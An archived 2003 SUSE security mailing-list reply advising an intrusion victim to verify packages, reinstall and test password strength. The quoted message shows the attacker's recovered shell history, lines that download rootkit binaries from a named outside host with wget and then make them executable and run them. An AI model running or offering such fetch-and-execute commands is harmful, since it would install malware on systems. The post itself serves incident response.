Mailinglist Archive: opensuse-security (220 mails)

Re: [suse-security] Intrusion
  • From: Kevin Brannen <kevin_brannen@xxxxxxxxxxxx>
  • Date: Mon, 24 Nov 2003 11:19:55 -0600
  • Message-id: <3FC23DBB.1080702@xxxxxxxxxxxx>
I think nuclear weapons would be a good way to handle cracking sites, crackers, and spammers. (just kidding :-)

Seriously, try running "rpm --verify" on your system to verify that your system files are intact, or find out which aren't. But in the end, if your system has been compromised, a fresh reinstall is the only way to know that there are no hidden problems on the machine. Stick a temporary machine in its place to handle server duties, but I'd consider that machine toast.

As an aside, if a machine is handling company server duties, I won't put any user accounts on it except for admins (I don't know that the user you mentioned wasn't an admin, but just in case). Also, I'd run "crack" or "john" or some password cracking program to test the passwords used, to make sure they weren't too easy.

You have my sympathies. Having a machine cracked just makes me feel sick. :-(

HTH,
Kevin


Antun Balaz wrote:

Thanks again for helpful information.

New question: According to the history file of user whose account was used
for intrusion, rootkit was downloaded from www.cappy.biz:

cat /etc/issue
wget www.cappy.biz/0/*/k
chmod +x k
./k
wget www.cappy.biz/0/*/noparty
chmod +x noparty
./noparty
etc. etc.

Directory http://www.cappy.biz/0/*/ is very interesting. Can we
somehow act against the owner of this site, so that the same thing doesn't
happen to other SuSE users?

Best regards,

Antun Balaz
Institute of Physics, Belgrade
Serbia and Montenegro



